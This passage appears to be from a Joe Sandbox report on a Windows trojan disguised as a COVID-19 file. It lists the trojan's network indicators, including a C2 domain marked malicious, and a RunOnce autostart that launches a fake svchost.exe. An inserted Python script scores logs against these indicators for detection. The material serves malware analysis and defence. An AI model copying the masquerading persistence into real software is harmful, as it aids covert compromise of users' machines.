                                                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schema.org/NewsArticleNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://www.liverpool.com/schedule/svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schema.org/BreadcrumbListNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://securepubads.g.doubleclick.net/tag/js/gpt.jsNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000001B.00000002.311128902.000002237723D000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://s2-prod.liverpool.com/svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000001B.00000002.311156508.0000022377242000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://felix.data.tm-awx.com/ampconfig.json&quot;New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      http://schema.org/ListItemsvchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                        high

                                                                        Contacted IPs


                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-AS (US) | false
104.21.31.39 | liverpoolofcfanclub.com | United States | 13335 | CLOUDFLARENET (US) | true
103.28.70.164 | devils.shacknet.us | United States | 29802 | HVC-AS (US) | false

                                                                        Private

                                                                        IP
                                                                        192.168.2.1
                                                                        127.0.0.1
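The Contacted IPs table above mixes one destination the report marks as malicious (104.21.31.39, liverpoolofcfanclub.com) with public IP-lookup services (ip-api.com, and api.ipify.org and freegeoip.net in the URL list) that the sample queries to geolocate the victim but that plenty of legitimate software also uses. The Python below is an added example, not part of the Joe Sandbox report: it weights those indicators differently, ignores the Private table addresses (192.168.2.1, 127.0.0.1 are sandbox plumbing), and scores constructed proxy log lines per host and process image. The log line layout, the weights, the host names and the svchost.exe-outside-System32 heuristic (drawn from the Source column, which shows the sample's strings inside svchost.exe memory) are assumptions of the example, not facts stated by the report.

```python
"""Added example (not part of the Joe Sandbox report): score constructed proxy
log lines against the network indicators listed in the Contacted IPs table."""
import ipaddress
import re
from collections import defaultdict

# Destinations from the Contacted IPs table. Weight 3: the report marks the
# destination Malicious. Weight 1: public IP-lookup services; this sample carries
# ip-api.com, api.ipify.org and freegeoip.net strings (see the URL list), but many
# legitimate programs query the same services, so one hit is only corroboration.
IP_INDICATORS = {
    "104.21.31.39": ("liverpoolofcfanclub.com", 3),
    "208.95.112.1": ("ip-api.com", 1),
    "103.28.70.164": ("devils.shacknet.us", 1),
}
DOMAIN_INDICATORS = {
    "liverpoolofcfanclub.com": 3,
    "devils.shacknet.us": 1,
    "ip-api.com": 1,
    "api.ipify.org": 1,
    "freegeoip.net": 1,
}
# Constructed log layout (assumption): "<timestamp> <host> <image path> <dst> <dst port>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<image>\S+)\s+(?P<dst>\S+)\s+(?P<dport>\d+)$")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
MASQUERADE_WEIGHT = 2  # assumption: path anomaly counts about as much as two weak hits


def score_destination(dst):
    """Return (weight, matched indicator) for an IP or hostname; (0, "") if unknown."""
    try:
        ip = ipaddress.ip_address(dst)
    except ValueError:
        name = dst.lower().rstrip(".")
        for dom, weight in DOMAIN_INDICATORS.items():
            if name == dom or name.endswith("." + dom):
                return weight, dom
        return 0, ""
    if ip.is_private or ip.is_loopback:
        return 0, ""  # 192.168.2.1 / 127.0.0.1 from the Private table are not C2
    dom, weight = IP_INDICATORS.get(str(ip), ("", 0))
    return weight, dom


def masquerading_system_binary(image):
    """True for a process named svchost.exe running outside the Windows system
    directories (assumed heuristic; the real binary lives in System32/SysWOW64)."""
    path = image.lower()
    return path.rsplit("\\", 1)[-1] == "svchost.exe" and not path.startswith(SYSTEM_DIRS)


def triage(lines, alert_at=3):
    """Aggregate indicator weight per (host, image). Returns
    {(host, image): {"score": int, "verdict": str, "reasons": [str]}}."""
    agg = defaultdict(lambda: {"score": 0, "verdict": "none", "reasons": []})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess fields
        entry = agg[(m["host"], m["image"])]
        weight, label = score_destination(m["dst"])
        if weight:
            entry["score"] += weight
            entry["reasons"].append(f"{m['dst']}:{m['dport']} matches {label} (+{weight})")
        if masquerading_system_binary(m["image"]) and "masquerade" not in entry:
            entry["masquerade"] = True  # count the path anomaly once per image
            entry["score"] += MASQUERADE_WEIGHT
            entry["reasons"].append(f"{m['image']} is svchost.exe outside System32 (+{MASQUERADE_WEIGHT})")
    for entry in agg.values():
        if entry["score"] >= alert_at:
            entry["verdict"] = "alert"
        elif entry["score"] > 0:
            entry["verdict"] = "weak"  # a lone IP-lookup hit needs a second indicator
    return dict(agg)


# Constructed sample log lines; only the IPs/domains from the report tables are real indicators.
SAMPLE_LOGS = [
    "2021-03-09T22:18:10Z WS01 C:\\Users\\user\\AppData\\Roaming\\svchost.exe 208.95.112.1 80",
    "2021-03-09T22:18:12Z WS01 C:\\Users\\user\\AppData\\Roaming\\svchost.exe 104.21.31.39 443",
    "2021-03-09T22:18:15Z WS01 C:\\Users\\user\\AppData\\Roaming\\svchost.exe 192.168.2.1 53",
    "2021-03-09T22:20:00Z WS02 C:\\Windows\\System32\\svchost.exe 203.0.113.10 443",
    "2021-03-09T22:21:00Z WS03 C:\\ProgramData\\Acme\\agent.exe ip-api.com 80",
    "not a log line",
]

if __name__ == "__main__":
    for (host, image), entry in triage(SAMPLE_LOGS).items():
        print(host, image, entry["verdict"], entry["score"], "; ".join(entry["reasons"]))
```

With the constructed input, WS01 reaches "alert" (malicious destination plus ip-api.com plus the path anomaly), WS02 stays "none" because the real svchost.exe talking to an unlisted address matches nothing, and WS03 is only "weak": an agent querying ip-api.com on its own is exactly the kind of hit that should be corroborated, not paged on.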

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                        Analysis ID:365752
                                                                        Start date:09.03.2021
                                                                        Start time:22:17:56
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 14m 16s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:New variant of covid 19.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:40
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@48/29@47/5
                                                                        EGA Information:
                                                                        • Successful, ratio: 16.7%
                                                                        HDC Information:
                                                                        • Successful, ratio: 0.7% (good quality ratio 0.4%)
                                                                        • Quality average: 37.4%
                                                                        • Quality standard deviation: 38.4%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 92.122.145.220, 168.61.161.212, 93.184.221.240, 104.43.139.144, 52.255.188.83, 104.43.193.48, 23.210.248.85, 51.11.168.160, 205.185.216.42, 205.185.216.10, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194
                                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6552 because it is empty
                                                                        • Execution Graph export aborted for target svchost.exe, PID 1488 because there are no executed functions
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        Time | Type | Description
                                                                        22:18:40 | API Interceptor | 1x Sleep call for process: New variant of covid 19.exe modified
                                                                        22:18:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenX explorer.exe "C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe"
                                                                        22:19:03 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                        22:19:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenX explorer.exe "C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe"
                                                                        22:19:09 | API Interceptor | 4x Sleep call for process: svchost.exe modified
                                                                        22:19:16 | API Interceptor | 58x Sleep call for process: powershell.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        Match | Associated Sample Name / URL | Detection | Context
                                                                        208.95.112.1 | Shipment documents pdf.jar | malicious | ip-api.com/json/
                                                                        208.95.112.1 | O8FQdUK9P0.exe | malicious | ip-api.com/line/
                                                                        208.95.112.1 | OVERDUE INVOICE.jar | malicious | ip-api.com/json/
                                                                        208.95.112.1 | OVERDUE INVOICE.jar | malicious | ip-api.com/json/
                                                                        208.95.112.1 | LjtPTxmLC7.exe | malicious | ip-api.com/json
                                                                        208.95.112.1 | Documents.pdf.exe | malicious | ip-api.com/json/
                                                                        208.95.112.1 | Korea Shipment Return Receipt 20210303_pdf.exe | malicious | ip-api.com/line/?fields=hosting
                                                                        208.95.112.1 | Cl0BXg5o8C.exe | malicious | ip-api.com/line/
                                                                        208.95.112.1 | vW4DTPbAYe.exe | malicious | ip-api.com/json/
                                                                        208.95.112.1 | dfbzXONkPM.exe | malicious | ip-api.com/json/
                                                                        208.95.112.1 | CBF70lVX8M.exe | malicious | ip-api.com/xml
                                                                        208.95.112.1 | nqljf9D3k7.exe | malicious | ip-api.com/json/
                                                                        208.95.112.1 | 0wTbI1V07f.exe | malicious | ip-api.com/json/
                                                                        208.95.112.1 | i795zXB64c.exe | malicious | ip-api.com/json/
                                                                        208.95.112.1 | z09012021780102100001078.js | malicious | ip-api.com/json/
                                                                        208.95.112.1 | Quotation (RFQ).exe | malicious | ip-api.com/line/?fields=hosting
                                                                        208.95.112.1 | LdbSc1QMsk.exe | malicious | ip-api.com/xml
                                                                        208.95.112.1 | 11VLjko22U.exe | malicious | ip-api.com/json/
                                                                        208.95.112.1 | bPIaXZBdd0.exe | malicious | ip-api.com/xml
                                                                        208.95.112.1 | JVVgAyVhwe.exe | malicious | ip-api.com/xml

                                                                        Domains

                                                                        Match | Associated Sample Name / URL | Detection | Context
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Trojan.Win32.Save.a.5815.exe | malicious | 172.67.174.240
                                                                        liverpoolofcfanclub.com | Order08032021.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | Hengsu_H213800.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | Nadisveli.exe | malicious | 172.67.174.240
                                                                        liverpoolofcfanclub.com | Payment slip.exe | malicious | 172.67.174.240
                                                                        liverpoolofcfanclub.com | Inquiry #00103092021.exe | malicious | 172.67.174.240
                                                                        liverpoolofcfanclub.com | UAQaXpJZ6l.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | Tax Invoice_309221.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | CN-Invoice-XXXXX9808-19011143287998.exe | malicious | 172.67.174.240
                                                                        liverpoolofcfanclub.com | Matiexgoods.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | DOC-03082175453465667686557.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Trojan.Win32.Save.a.6326.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Program.Win32.Wacapew.Cml.2151.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Win32.Trojan.Inject.Auto.29141.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Trojan.GenericKD.36471379.15757.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.StaticAI-SuspiciousPE.13139.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Program.Win32.Wacapew.Cml.24985.exe | malicious | 172.67.174.240
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.generic.ml.7366.exe | malicious | 172.67.174.240
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Trojan.Win32.Save.a.16344.exe | malicious | 104.21.31.39
                                                                        liverpoolofcfanclub.com | SecuriteInfo.com.Trojan.Win32.Save.a.25010.exe | malicious | 104.21.31.39
                                                                        ip-api.com | Shipment documents pdf.jar | malicious | 208.95.112.1
                                                                        ip-api.com | O8FQdUK9P0.exe | malicious | 208.95.112.1
                                                                        ip-api.com | OVERDUE INVOICE.jar | malicious | 208.95.112.1
                                                                        ip-api.com | OVERDUE INVOICE.jar | malicious | 208.95.112.1
                                                                        ip-api.com | LjtPTxmLC7.exe | malicious | 208.95.112.1
                                                                        ip-api.com | Documents.pdf.exe | malicious | 208.95.112.1
                                                                        ip-api.com | Korea Shipment Return Receipt 20210303_pdf.exe | malicious | 208.95.112.1
                                                                        ip-api.com | Cl0BXg5o8C.exe | malicious | 208.95.112.1
                                                                        ip-api.com | vW4DTPbAYe.exe | malicious | 208.95.112.1
                                                                        ip-api.com | dfbzXONkPM.exe | malicious | 208.95.112.1
                                                                        ip-api.com | CBF70lVX8M.exe | malicious | 208.95.112.1
                                                                        ip-api.com | nqljf9D3k7.exe | malicious | 208.95.112.1
                                                                        ip-api.com | 0wTbI1V07f.exe | malicious | 208.95.112.1
                                                                        ip-api.com | i795zXB64c.exe | malicious | 208.95.112.1
                                                                        ip-api.com | z09012021780102100001078.js | malicious | 208.95.112.1
                                                                        ip-api.com | Quotation (RFQ).exe | malicious | 208.95.112.1
                                                                        ip-api.com | LdbSc1QMsk.exe | malicious | 208.95.112.1
                                                                        ip-api.com | 11VLjko22U.exe | malicious | 208.95.112.1
                                                                        ip-api.com | bPIaXZBdd0.exe | malicious | 208.95.112.1
                                                                        ip-api.com | JVVgAyVhwe.exe | malicious | 208.95.112.1

                                                                        ASN

                                                                        Match | Associated Sample Name / URL | Detection | Context
                                                                        HVC-ASUS | Complaint-Copy-684082724-03092021.xls | malicious | 23.111.148.162
                                                                        HVC-ASUS | Complaint-Copy-684082724-03092021.xls | malicious | 23.111.148.162
                                                                        HVC-ASUS | P.O71540.xlsx | malicious | 46.21.153.231
                                                                        HVC-ASUS | WinRAR_1845561462.exe | malicious | 194.126.175.195
                                                                        HVC-ASUS | RS12.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | OH76.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | JX75.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | RV15.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | MP57.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | UZ44.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | NC54.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | UD73.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | DB34.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | XL49.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | HN75.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | ST22.vbs | malicious | 209.133.209.251
                                                                        HVC-ASUS | PO342823.xlsx | malicious | 46.21.153.231
                                                                        HVC-ASUS | IRS-TAX.xlsm | malicious | 194.126.175.2
                                                                        HVC-ASUS | IRS-TAX.xlsm | malicious | 194.126.175.2
                                                                        HVC-ASUS | IRS-TAX.xlsm | malicious | 194.126.175.2
                                                                        TUT-ASUS | Shipment documents pdf.jar | malicious | 208.95.112.1
                                                                        TUT-ASUS | O8FQdUK9P0.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | OVERDUE INVOICE.jar | malicious | 208.95.112.1
                                                                        TUT-ASUS | OVERDUE INVOICE.jar | malicious | 208.95.112.1
                                                                        TUT-ASUS | LjtPTxmLC7.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | Documents.pdf.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | Korea Shipment Return Receipt 20210303_pdf.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | Cl0BXg5o8C.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | vW4DTPbAYe.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | dfbzXONkPM.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | CBF70lVX8M.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | nqljf9D3k7.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | 0wTbI1V07f.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | i795zXB64c.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | z09012021780102100001078.js | malicious | 208.95.112.1
                                                                        TUT-ASUS | Quotation (RFQ).exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | LdbSc1QMsk.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | 11VLjko22U.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | I08uE3nemA.exe | malicious | 208.95.112.1
                                                                        TUT-ASUS | bPIaXZBdd0.exe | malicious | 208.95.112.1
                                                                        CLOUDFLARENETUS | QJm5ae3qwZ.dll | malicious | 104.20.184.68
                                                                        CLOUDFLARENETUS | SecuriteInfo.com.Trojan.Win32.Save.a.27630.dll | malicious | 104.20.185.68
                                                                        CLOUDFLARENETUS | Complaint-Copy-676926603-03092021.xls | malicious | 172.67.202.46
                                                                        CLOUDFLARENETUS | Complaint-Copy-645863057-03092021.xls | malicious | 172.67.202.46
                                                                        CLOUDFLARENETUS | Complaint-Copy-676926603-03092021.xls | malicious | 104.21.14.19
                                                                        CLOUDFLARENETUS | Complaint-Copy-645863057-03092021.xls | malicious | 104.21.14.19
                                                                        CLOUDFLARENETUS | lptV9TKRE2.dll | malicious | 104.20.185.68
                                                                        CLOUDFLARENETUS | qbJSQpaAiy.dll | malicious | 104.20.185.68
                                                                        CLOUDFLARENETUS | CCqjThQhKf.dll | malicious | 104.20.184.68
                                                                        CLOUDFLARENETUS | 6PRaskNs.exe | malicious | 104.23.99.190
                                                                        CLOUDFLARENETUS | SecuriteInfo.com.Trojan.Win32.Save.a.32500.dll | malicious | 104.20.185.68
                                                                        CLOUDFLARENETUS | ExistingExcel.dll | malicious | 104.20.185.68
                                                                        CLOUDFLARENETUS | commerce _03.09.2021.doc | malicious | 104.21.26.115
                                                                        CLOUDFLARENETUS | FeDex Shipment Confirmation.exe | malicious | 23.227.38.74
                                                                        CLOUDFLARENETUS | Complaint-Copy-1308127799-03092021.xls | malicious | 172.67.202.46
                                                                        CLOUDFLARENETUS | Complaint-Copy-1308127799-03092021.xls | malicious | 104.21.14.19
                                                                        CLOUDFLARENETUS | FeDex Shipment Confirmation.exe | malicious | 172.67.148.56
                                                                        CLOUDFLARENETUS | Complaint-Copy-1308127799-03092021.xls | malicious | 104.21.14.19
                                                                        CLOUDFLARENETUS | Complaint-Copy-1308127799-03092021.xls | malicious | 172.67.202.46
                                                                        CLOUDFLARENETUS | PERuTR7vGb.dll | malicious | 104.20.184.68

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):0.36205444996716485
                                                                        Encrypted:false
                                                                        SSDEEP:48:UtcctcMtcctcMtcctcMtcctcQtcctc0tcctc:UtTtDtTtDtTtDtTtTtTtbtTt
                                                                        MD5:353C0E84A6C573D30B15481706263B9A
                                                                        SHA1:4DCBF5ED97F1251EEF6E0747906368AB5639D0FA
                                                                        SHA-256:4412C6044B8C975D5BAB1F0E173339AE2A091A3B4D2DFBF771F1E9B854EF1751
                                                                        SHA-512:210B6E533923CF5F3FE255C39E1B2D243F675D2C022FA613E3ABD680FB552A2FD9079BF1699C91A5033AED47E29EE0191CF6E307429554A3128D2C009E047AFD
                                                                        Malicious:false
                                                                        Preview: .............'..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................).............................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.24175664763109972
                                                                        Encrypted:false
                                                                        SSDEEP:12:bqrGaD0JcaaD0JwQQ/tAg/0bjSQJqvBJX8JV1tJV1:bqtgJctgJwXurjSucJX8JVbJV
                                                                        MD5:09D5ACBF323A6DE3EAB1CDC24DF0FB3E
                                                                        SHA1:CE2B3CC4BB95F467F67C48029C56513ABF52711F
                                                                        SHA-256:CA18145E467CCFD63D52C297C448BE3DE3FE21E9F9E9AEB475A77C842607560C
                                                                        SHA-512:772ACDDA83937D1543CD8C5DBF65E9FAFC0970855FE727D2BB8B7DE30AF4357DC479F74D05BC455435E2106DE7FA2B74B92847A660608EEE81EF8A8760498940
